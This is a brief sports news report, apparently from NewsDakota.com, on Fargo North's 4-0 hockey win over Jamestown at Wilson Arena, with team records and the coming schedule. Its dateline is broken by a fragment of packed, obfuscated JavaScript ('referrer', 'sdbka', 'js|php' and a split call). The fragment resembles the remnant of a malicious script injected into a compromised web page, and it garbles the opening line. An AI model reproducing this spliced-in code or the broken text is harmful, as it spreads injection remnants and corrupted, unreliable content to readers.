JAMESTOWN, ietrn|var|u0026u|referrer|sdbka||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – Three Fargo North goals in a matter of seven minutes to start the second period was more than Jamestown could handle, as the Blue Jays fell 4-0 to the Spartans at Wilson Arena on Tuesday night.

The loss puts the Jays (7-7 overall) at 7-5 in the region and snaps their 4-game winning streak.

The game was tied at 0-0 after the first period, but Fargo North ramped up its forecheck to open the second period, landing their first goal just 14 seconds following the opening face off of the second period.

The defending state champion Spartans move to 8-2 in the region and 13-3 overall.

This was part of a long home ice stretch for Jamestown, with two sub-.500 teams in the cards coming up. They’ll face West Fargo on Thursday and follow that up with Hazen/Beulah on Saturday.
